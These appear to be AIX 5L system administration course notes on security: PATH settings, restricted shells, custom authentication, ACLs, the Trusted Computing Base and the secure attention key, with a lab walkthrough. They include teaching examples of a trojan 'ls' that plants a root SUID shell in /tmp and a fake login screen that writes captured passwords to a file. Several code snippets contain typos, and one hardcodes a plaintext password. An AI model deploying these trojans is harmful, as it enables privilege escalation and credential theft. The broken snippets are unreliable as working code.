AIX 5L SysAdmin II: (Unit 12) – Security

Unit Objectives:
———————–
1. Provide Authentication Procedures
2. Specify Extended File Permissions
3. Configure the Trusted Computing Base (TCB)

Protecting Your System:
————————————
Hardware – Access to boot media, Access to front key
Login – Passwords, System logged in but not used, Trojan horse
Shell – Restricted shell, Execution of unauthorized programs, Trojan

How Do You Set Up Your PATH?
————————————————-
Which Path is more secure?

PATH=/usr/bin:/etc:/usr/sbin:/sbin:. or
PATH=.:/usr/bin:/etc:/usr/sbin:/sbin (Don’t ever use this path)

Note: It is better to not use either one because they both include the current directory “.” which could be anywhere.

Trojan Horse: An Easy Example (1 or 3)
———————————————————–
cd /home/hacker
vi ls
# !/usr/bin/ksh

cp /usr/bin/ksh /tmp/.hacker
chown root /tmp/.hacker
chmod u+s /tmp/.hacker

rm -f $0
/usr/bin/ls $*

chmod a+x ls

Note: u+s above – SUID-Bit: Runs under root authority

Trojan Horse: An Easy Example (2 of 3)
———————————————————-
Hacker creates a -i file
cd /home/hacker
cat > -i
blablaba

Hello SysAdmin, I have a file “-i” and cannot remove it. Please help me…

PATH=.:/usr/bin:/etc:/usr/sbin:/sbin (Don’t use this PATH!!!)
Actually runs the ls script in the /home/hacker directory instead of the ls command.

cd /home/hacker
ls
-i

login.cfg: login prompts

# vi /etc/security/login.cfg

default:
sak_enabled = false
logintimes =
…..
herald = “\n\*Restricted Access”\n\rAuthorized Users Only\n\rLogin:”

login.cfg: Restricted Shell
—————————————
# vi /etc/security/login.cfg

Other security attributes
usw:
shells = /bin/sh,/bin/bsh,/usr/bin/ksh, …,/usr/bin/Rsh

# chuser shell=/usr/bin/Rsh michael
michael can’t:
– Change the current directory
– Change the PATH variable
– Use command names containing slashes
– Redirect standard output (>,>>)

Customized Authentication:
—————————————–
# vi /usr/lib/security/methods.cfg
* Authentication Methods
secondPassword:
program = /usr/local/bin/getSecondPassword

# vi /etc/security/user
michael:
auth1 = SYSTEM,secondPassword

Note: This activates a second program to authenticate users.

Authentication Methods (1 of 2):
————————————————
# vi /usr/local/bin/getSecondPassword
print “Please enter the second Password: ”
stty -echo # No input visible
read PASSWORD
stty echo

if [[ $PASSWORD = “d1f2g3” ]]; then
exit 0 (Valid Login)
else
exit 255 (Invalid Login)
fi

Authentication Methods (2 of 2):
———————————————–
# vi /usr/local/bin/limitLogins

#! /usr/bin/ksh
# Limit login to one session per user
USER=$1 # User name is first argument
# How often is the user logged in?
COUNT-$(WHO | GREP “^$USER | wc -l)
# User already logged in?
if [[ $COUNT -ge 1 ]]; then
errlogger “$1 tried more than 1 login”
print “Only one login is allowed”
exit 128
fi

exit 0 # Return 0 for correct authentication

Two-Key Authentication:
————————————
# vi /etc/security/user

boss:
auth1 = SYSTEM;deputy1,SYSTEM;deputy2

login: boss
deputy1’s Password:
deputy2’s Password:

Base Permissions:
—————————–
salaries

owner = silva
group = staff
Base permissions = rwx(owner) —(group) —(others)
How can silva easily give simon read access to the file salaries?

Setting up permissions for the group will give access to all in the group. But what if you only want one person to

Extended Permissions: Access Control Lists
——————————————————————
Extended Permissions: permit r– u:simon
# acledit salaries
base permissions

extended permissions
enabled
permit r– u:simon

ACL Commands:
————————-
# aclget file1 – Display base/extended permissions
# aclget status99 | aclput report99 – Copy an Access Control List
# acledit salaries2 – To specify extended permissions

– chmod in the octal format diables ACLs (Use chmod u+x salaries instead of chmod 777 salaries)
– Only the backup command saves ACLs
– acledit requires the EDITOR variable (full pathname of an AIX editor)

ACL Keywords: permit and specify:
—————————————————-
# acledit status99

attributes:
base permissions

extended permissions
enable
permit –x u:michael
specify r– u:anne,g:account
specify r– u:nadine

– michael (member in the group finance) gets read, write (base) and execute (extended) permissions.
– If anne is in group account, she gets read permissions on file status99
– nadine (member in group finance) gets only read access

ACL Keywords: deny
———————————
# acledit report99
attributes:
base permissions

extended permissions
enabled
deny r– u:paul g:mail
deny r– g:gateway

– deny: Restricts the user or group from using the specified access to the file
– deny overrules permit and specify

The Trusted Computing Base (TCB):
—————————————————–
The TCB is the part of the system that is responsible for enforcing the security policies of the system

# ls -l /etc/passwd
-rw-r–rw- 1 root security … /etc/passwd

# ls -l /usr/bin/be_happy
-r-sr-xr-x 1 root system … /usr/bin/be_happy

Note: TCB is installed with the operating system but has to be enabled.

TCB Components:
—————————-
The AIX Kernel
Configuration files that control AIX
Any program that alters the kernel or an AIX configuration file

The TCB can only be enabled at installation time. You can not switch it on or off later, only through re-installation.

Note: 98% of users don’t enable TCB. Only used for very secure environments.

Checking the Trusted Computing Base:
———————————————————-
– Reports differences
– Implements fixes

Security Model:
/etc/security
tcbck
sysck.cfg
/etc/passwd:
owner = root
mode = 644

Reality:
/etc/passwd rw-r–r–

The sysck.cfg File
—————————-
# vi /etc/security/sysck.cfg

/etc/passwd:
owner = root
group = security
mode = TCB, 644
type = FILE
class = apply, inventory, bos.rte.security
checksum = VOLATILE
size = VOLATILE

# tcbck -t /etc/passwd (Verifies files)

Note: TCP will always check to make sure that nothing has changed.

tcbck: Checking Mode Examples:
—————————————————
tcbck -n Report(Y) Fix(N)
tcbck -p Report(N) Fix(Y)
tcbck -t Report(Y) Fix(Prompt)
tcbck -y Report(Y) Fix(Y)

can be:
– a filename (for example /etc/passwd)
– a classname: Logical group of files defined by a class = name in sysck.cfg
– tree: Check all files in the filesystem tree
– ALL: Check all files listed in sysck.cfg

tcbck: Update Mode Examples:
———————————————-
# tcbck -a /salary/salary.dat class=salary
Add salary.dat to sysck.cfg in the class salary

# tcbck -t salary – Test all files belonging to class salary
# tcbck -d /etc/cvid – Delete file /etc/cvid from sysck.cfg

Note: TCB requires a lot of maintenance as it is used.

chtcb: Marking Files As Trusted
———————————————–
# ls -le /salary/salary.dat
-rw-rw— – Not trusted
-rw-rw— + Trusted File

tcbck: Effective Usage:
———————————-
tcbck – n (Normal mode)
tcbck -t (Interactive mode)
Paranoid Use – Store the sysck.cfg file offline and restore it periodically to check out the system.

Trusted Communication Path:
——————————————–
The Trusted Communicatio Path allows for secure communication between users and the Trusted Computing Base.

What do you think when you see this screen on a terminal?

AIX Version 4
(C) Copyrights by IBM and by others 1982, 1996
login:

Note: This could be a Trojan horse script that will steal my login and password.

Trusted Communication Path: Trojan Horse
—————————————————————-
#!/usr/bin/ksh

print”AIX Version 4″
print “(C) Copyrights by IBM and by others 1982, 1996”
print -n “login:”
read NAME
print -n “$NAME’s Password:”
stty -echo
read PASSWORD
stty echo
print $PASSWORD > /tmp/.4711

$ cat /tmp/.4711
darth22

Trusted Communication Path Elements:
———————————————————-
1. A trusted shell (tsh) that only executes commands that are marked as being trusted
2. A trusted terminal
3. A reserved key sequence, called the secure attention key (SAK), which allows the user to request a trusted communication path

Using the Secure Attention Key (SAK)
———————————————————
Before logging in at the trusted terminal:

tsh>
Previous login was a trojan horse.

Ensures that no untrusted programs will be run with root authority.

Configuring the Secure Attention Key:
——————————————————-
Configure a trusted terminal:
# vi /etc/security/login.cfg
/dev/tty0:
sak_enabled = true

Eanble a user to use the trusted shell:
# vi /etc/security/user
root:
tpath = on

chtcb: Changing the TCB Attribute:
—————————————————-
# chtcb query /usr/bin/ls
/usr/bin/ls is not in the TCB

tsh>ls *.c
ls: Command must be trusted to run in the tsh

# chtcb on /usr/bin/ls
tsh>ls *.c
a.c b.c d.c

FAQs:
———-
Q: How do I install the TCB fileset on my machine?
A: You cannot just install TCB to an existing install. TCB must be installed at the same time the operating is installed. You will be prompted during installation
?????
Q: Are my files secure on my backup tapes?
A: You need to physically protect your data on your backup tapes.

Q: Why don’t we address auth2 very much?
A: Auth2 is not a sceurity feature. Auth2 allows you to collect information during the login process.

Lab:
——–
vi /etc/security/login.cfg

default:
sak_enabled = false
logintimes =
logindisable = 0
logininterval = 0
loginreenable = 0
logindelay = 0
herald = “\n\n\n\n# Restricted Access #\n\rAuthorized Users Only\n\r”

:wq
exit
Relogin

# Restricted Access #
Authorized Users Only
Login:_

who /etc/security/failedlogin | more
more /var/adm/sulog

who /var/adm/wtmp | more
last root

vi /home/workshop/ex14_login (view the file)
ls -l /home/workshop/ex14_login (check permission)

vi /usr/lib/security/methods.cfg
COUNT:
program = /home/workshop/ex14_login
:wq

vi /etc/security/user
team01:
admin = faluse
auth1 = SYSTEM.COUNT
:wq

startx (start AIX Windows)
login as team01
login again as team01
Only one login allowed per user….
whoami
team01
exit

vi /etc/security/user (remove previous entry from team01 stanza)
:wq

mkuser michael (create a new user)
mkuser sarah
passwd michael (create passwords for michael)
passwd sarah

su team01
cd /home/team01
vi sample
tput clear
banner We love AIX
print End of Program
:wq

chmod 777 sample
ls -l sample
sample (execute the script)
chmod 700 sample
exit

Login as michael
pwd
/home/michael
cd /home/team01
cat sample
ls -l /home/team01/sample
exit

Login as team01
vi .profile
export EDITOR=/usr/bin/vi
:wq

./.profile (re-execute the profile)

echo $EDITOR (check to make sure it is set)
/usr/bin/vi

acledit sample
attributes
base permissions
owner[team01]: rwx
group[staff]: —
others: —
extended permissions
enabled
permit rwx u:michael
permit r-x u:sarah
:wq
Should the modified ACL be applied? (yes) or (no) y
ls -e sample
-rwx——+ 1 team01 staff (+ says that ACL is enabled)
exit

login as michael
cd /home/team01
vi sample
date (add command)
:wq

./sample (re-execute)
exit

login as sarah
cd /home/team01
vi sample
echo This is from sarah (add command)
:wq
The file has read permission only. error
:q!
exit

login as team01
acledit sample
attributes
base permissions
owner[team01]: rwx
group[staff]: r-x
others: —
extended permissions
enabled
deny rwx u:michael
:wq
Should the modified ACL be applied? (yes) or (no) y
exit

login as michael
$ groups
staff
cd /home/team01

ls -l sample
-rwxr-x— 1 team01 staff
./sample
./sample: 0403-006 Execute permission denied.
exit

login as team01
vi sample2
echo hello class
echo today is date
echo goodbye
:wq

aclget sample2
attributes:
base permissions
owner[team01]: rw-
group[staff]: r–
others: r–
extended permissions
disabled

aclget sample | aclput sample2
aclget sample2

cdmod 700 sample (Lose ACL permissions using octal notation)
aclget sample
Note: It changed enabled to disabled in the ACL. Instead use the symbolic notation when changing permissions.

Leave a Reply

Your email address will not be published. Required fields are marked *

*